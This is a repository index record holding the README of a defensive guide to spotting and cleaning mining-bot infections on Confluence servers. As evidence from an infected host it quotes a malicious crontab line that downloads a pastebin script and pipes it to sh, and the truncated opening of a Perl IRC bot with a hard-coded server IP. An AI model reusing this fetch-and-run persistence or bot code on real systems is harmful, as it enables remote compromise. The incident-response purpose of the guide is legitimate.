{"id":21700698,"url":"https://github.com/marcocesarato/shell-botkiller","last_synced_at":"2025-06-24T15:32:15.481Z","repository":{"id":65583303,"uuid":"189657160","full_name":"marcocesarato/Shell-BotKiller","owner":"marcocesarato","description":"We'll post findings from an infected confluence-systems we investigated recently, to show how it looks/feel like. the most systems we took a look at were infected with mining-bots like kerberods.","archived":false,"fork":false,"pushed_at":"2019-06-19T07:11:37.000Z","size":32,"stargazers_count":3,"open_issues_count":0,"forks_count":4,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-05-10T20:01:48.197Z","etag":null,"topics":["bot","bots","infected","killerbot","process","server","shell","tutorial","zombies"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/marcocesarato.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-05-31T20:53:21.000Z","updated_at":"2024-08-12T19:49:33.000Z","dependencies_parsed_at":"2023-01-30T15:25:11.044Z","dependency_job_id":null,"html_url":"https://github.com/marcocesarato/Shell-BotKiller","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/marcocesarato/Shell-BotKiller","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marcocesarato%2FShell-BotKiller","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marcocesarato%2FShell-BotKiller/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marcocesarato%2FShell-BotKiller/releases","manifest
s_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marcocesarato%2FShell-BotKiller/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/marcocesarato","download_url":"https://codeload.github.com/marcocesarato/Shell-BotKiller/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marcocesarato%2FShell-BotKiller/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":261703162,"owners_count":23196907,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bot","bots","infected","killerbot","process","server","shell","tutorial","zombies"],"created_at":"2024-11-25T20:16:24.046Z","updated_at":"2025-06-24T15:32:15.453Z","avatar_url":"https://github.com/marcocesarato.png","language":"Shell","readme":"# Shell BotKiller\n\nWe'll post findings from infected Confluence systems we investigated recently, to show what an infection looks and feels like. Most of the systems we took a look at were infected with mining bots like kerberods.\n\nWith the rise of inexpensive virtual servers and popular services that install insecurely by default, coupled with some juicy vulnerabilities (read: RCE - Remote Code Execution), like CVE-2015-5377 and CVE-2015-1427, this year will be an interesting one for Elasticsearch. Elasticsearch provides plenty of targets for people to exploit and create server-based botnets, but in fairness it is not only Elasticsearch that suffers from critical vulnerabilities: there is also ShellShock, MongoDB exploits and, very recently, a bug that hit WebSphere, JBoss, Jenkins and OpenNMS.\n\n
## Commands to detect infections\n\n1. Check crontab entries `ls -lrth /var/spool/cron/crontabs`\n2. Check the temp dir `ls -la /tmp`\n3. Check the shm dir `ls -la /dev/shm`\n4. Check your dirs inside /opt `ls -la /opt/`\n5. Check for zombie processes `ps -ef`\n\n## How to prevent it\n\n1. Update your system/software\n2. Set the right permissions for your user\n\n## Example of Infected Server\n\n### Awkward crontab entries for a user\n```shell\n/var/spool/cron/crontabs # ls -lrth\ntotal 4.0K\n-rw------- 1 root netdev 285 Apr 15 15:34 tmp.Rj8JOI\n-rw-r--r-- 1 root netdev   0 Apr 16 12:42 root\n```\n\n```\n# cat tmp.Rj8JOI \n\n# DO NOT EDIT THIS FILE - edit the master and reinstall.\n# (- installed on Mon Apr 15 17:34:25 2019)\n# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)\n*/10 * * * * (curl -fsSL https://pastebin.com/raw/404NoMore||wget -q -O- https://pastebin.com/raw/404NoMore)|sh\n```\n\n### Files in /tmp that look suspicious\n- See below for the lok_bot\n- At least you get an infection date\n```shell\n# ls -la /tmp\n\ntotal 1460\ndrwxrwxrwt 1 root root    4096 Apr 29 08:05 .\ndrwxr-xr-x 1 root ro      4096 May 10  2018 ..\n-rw-r--r-- 1 usr1 usr1       0 Apr 27 14:17 .354da7\n-rw-r--r-- 1 usr1 usr1       5 Apr 22 06:23 .XIMunix\ndrwxr-xr-x 2 usr1 usr1    4096 Apr 19 17:45 .dba         \u003c-- Bot\ndrwxrwx--- 2 usr1 usr1    4096 Apr 27 21:42 .sysinfo     \u003c-- Bot\ndrwxr-xr-x 2 usr1 usr1    4096 Mar 13 08:41 hsperfdata_usr1\ndrwxr-xr-x 2 root root    4096 Oct  7  2016 hsperfdata_root\n-rwx------ 1 usr1 usr1  480296 Apr 27 21:42 ib_cm\n-rwx------ 1 usr1 usr1  480296 Apr 27 21:42 kworker_0:2\n-rwx------ 1 usr1 usr1  473096 Apr 22 18:30 kworker_1:1\n-rw-r--r-- 1 usr1 usr1       0 Apr 19 18:04 lok          \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1      12 Apr 27 20:33 tmp1         \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1       0 Apr 21 18:25 .changgggeerror \u003c--Bot\ndrwxr-xr-x 2 usr1 usr1    4096 Apr 27 15:18 .dba         \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1       0 Apr 29 06:38 .dbb         \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1     290 Apr 17 06:57 04dlOCl      \u003c-- Bot\n-rwxr-xr-x 1 usr1 usr1 1099016 Apr 29 06:38 jGcLFA1      \u003c-- Bot\ndrwxr-xr-x 2 usr1 usr1    4096 Apr 19 12:47 khugepageds  \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1     290 Apr 23 00:22 lIFa09m      \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1     160 Apr 14 11:26 lLNCeDg      \u003c-- Bot\n-rw-r--r-- 1 usr1 usr1     290 Apr 15 00:37 lMBH5ME      \u003c-- Bot\n\n--- 400 lines deleted ----\n```\n\n\n
### Files in /dev/shm that look suspicious\n- See below for the bot\n- At least you get an infection date\n\n```shell\n# ls -la /dev/shm\n\ntotal 8\ndrwxrwxrwt 2 root   root     60 Apr 18 17:53 .\ndrwxr-xr-x 5 root   root    340 Oct 10  2018 ..\n-rw-r--r-- 1 daemon daemon 7141 Apr 18 16:33 bt1.txt\n-rwxrwxrwx 1 daemon daemon 621K Mar 18 06:51 1mm6dgJ          \u003c-- maybe?\n-rw-r--r-- 1 daemon daemon    0 Apr 12 07:48 ec2a6            \u003c-- ???\n-rw-r--r-- 1 daemon daemon    0 Apr 12 07:48 de33f4f911f20761 \u003c-- ???\n-rw-r--r-- 1 daemon daemon  290 Apr 14 01:12 L2AJgih          \u003c-- exploit \n-rw-r--r-- 1 daemon daemon  160 Apr 14 01:12 77Ink36          \u003c-- exploit \n-rw-r--r-- 1 daemon daemon  290 Apr 14 01:15 H4m361b          \u003c-- exploit \n-rw-r--r-- 1 daemon daemon  160 Apr 14 01:15 1Gn6il2          \u003c-- exploit \n-rw-r--r-- 1 daemon daemon  290 Apr 14 01:29 JnImMDp          \u003c-- exploit \n-rw-r--r-- 1 daemon daemon  160 Apr 14 01:29 8N128a8          \u003c-- exploit \n-rw-r--r-- 1 daemon daemon  290 Apr 14 01:50 1bI0A61          \u003c-- exploit \n-rw-r--r-- 1 daemon daemon  160 Apr 14 01:50 Jb2jHPC          
\u003c-- exploit \n-rw-r--r-- 1 daemon daemon  290 Apr 14 02:03 aEEC4K5          \u003c-- exploit \n```\n\n### Zombie processes\n\nTo kill a zombie (process) you have to kill its parent process (just like real zombies!), but the question was how to find it.\n\n- Find the zombie\n\n```shell\n# ps aux | grep 'Z'\n```\n\n- What you get is Zombies and anything else with a Z in it, so you will also get the grep\n\n```\n# ps aux | grep 'Z'\n\nUSER       PID     %CPU %MEM  VSZ    RSS TTY      STAT START   TIME COMMAND\nusr1       13572   0.0  0.0   7628   992 pts/2    S+   19:40   0:00 grep --color=auto Z\nusr1       93572   0.0  0.0   0      0   ??       Z    19:40   0:00 something\n```\n\n- Find the zombie's parent\n\n```shell\n# pstree -p -s 93572\n\ninit(1)---cnid_metad(1311)---cnid_dbd(5145)\n```\n\nIn this case you do not want to kill that parent process and you should be quite happy with one zombie, but killing the immediate parent process 5145 should get rid of it.\n\n\n#### Example\n\n```shell\n# ps -ef\n\nUID        PID  PPID  C STIME TTY          TIME CMD\nusr1     1     0  1 Mar13 ?        12:56:36 /usr/bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Xms1024m -Xmx8192m -XX:MaxPermSize=512m -XX:+UseG1GC -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2019-03-13_08-41-53.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -XX:-PrintGCDetails -XX:+PrintGCTimeStamps -XX:-PrintTenuringDistribution -Djava.endorsed.dirs=/opt/atlassian/confluence/endorsed -classpath /opt/atlassian/confluence/bin/bootstrap.jar:/opt/atlassian/confluence/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence -Dcatalina.home=/opt/atlassian/confluence -Djava.io.tmpdir=/opt/atlassian/confluence/temp org.apache.catalina.startup.Bootstrap start\nusr1   336     1  0 Apr19 ?        
00:00:00 [kill] \u003cdefunct\u003e\nusr1   339     1  0 Apr21 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1   354     1  0 Apr19 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1   361     1  0 Apr17 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1   858     1  0 Apr22 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1   903     1  0 Apr21 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1   960     1  0 Apr20 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1  1015     1  0 Apr17 ?        00:00:00 [sh] \u003cdefunct\u003e\nusr1  1072     1  0 Apr20 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1  1086     1  0 Apr21 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1  1131     1  0 Apr20 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1  1274     1  0 Apr20 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1  1339     1  0 Apr21 ?        00:00:00 [sh] \u003cdefunct\u003e\nusr1  1341     1  0 Apr19 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1  1350     1  0 Apr21 ?        00:00:00 [sh] \u003cdefunct\u003e\nusr1  1395     1  0 Apr21 ?        00:00:00 [sh] \u003cdefunct\u003e\nusr1  1422     1  0 Apr21 ?        00:00:00 [sh] \u003cdefunct\u003e\nusr1  1434     1  0 Apr21 ?        00:00:00 [sh] \u003cdefunct\u003e\nusr1  1458     1  0 Apr21 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1  1523     1  0 Apr21 ?        00:00:00 [sh] \u003cdefunct\u003e\nusr1  1559     1  0 Apr21 ?        00:00:00 [sh] \u003cdefunct\u003e\nusr1  1614     1  0 Apr21 ?        00:00:00 [kill] \u003cdefunct\u003e\nusr1  1664     1  0 Apr21 ?        00:00:00 [sh] \u003cdefunct\u003e\nusr1  1726     1  0 Apr20 ?        00:00:00 [sh] \u003cdefunct\u003e\nusr1  1727     1  0 Apr20 ?        00:00:00 [sh] \u003cdefunct\u003e\nusr1  1748     1  0 Apr17 ?        
00:00:00 [kill] \u003cdefunct\u003e\n```\n\n## Example of bot\n\n```perl\ncat /dev/shm/bt1.txt\n\n\n#!/usr/bin/perl\nmy $processo =(\"test123\");\n\nmy @titi = (\"index.php?page=\",\"main.php?page=\");\n\nmy $goni = $titi[rand scalar @titi];\n\nmy $linas_max='3';\nmy $sleep='7';\nmy @adms=(\"x\", \"y\", \"z\", \"w\" );\nmy @hostauth=(\"local\");\nmy @canais=(\"#3w\");\nchop (my $nick = `uname`);\nmy $servidor=\"193.56.28.207\";\nmy $ircname =(\"g\");\nmy $realname = (\"g\");\nmy @ircport = (\"80\",\"143\");\nmy $porta = $ircport[rand scalar @ircport];\nmy $VERSAO = '0.5';\n$SIG{'INT'} = 'IGNORE';\n$SIG{'HUP'} = 'IGNORE';\n$SIG{'TERM'} = 'IGNORE';\n$SIG{'CHLD'} = 'IGNORE';\n$SIG{'PS'} = 'IGNORE';\nuse IO::Socket;\nuse Socket;\nuse IO::Select;\nchdir(\"/tmp\");\n$0=\"$processo\".\"\\0\"x16;;\nmy $pid=fork;\nexit if $pid;\ndie \"Problema com o fork: $!\" unless defined($pid);\n\nour %irc_servers;\nour %DCC;\nmy $dcc_sel = new IO::Select-\u003enew();\n\n$sel_cliente = IO::Select-\u003enew();\nsub sendraw {\n  if ($#_ == '1') {\n    my $socket = $_[0];\n    print $socket \"$_[1]\n    \n--- others lines deleted ----\n```","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmarcocesarato%2Fshell-botkiller","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmarcocesarato%2Fshell-botkiller","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmarcocesarato%2Fshell-botkiller/lists"}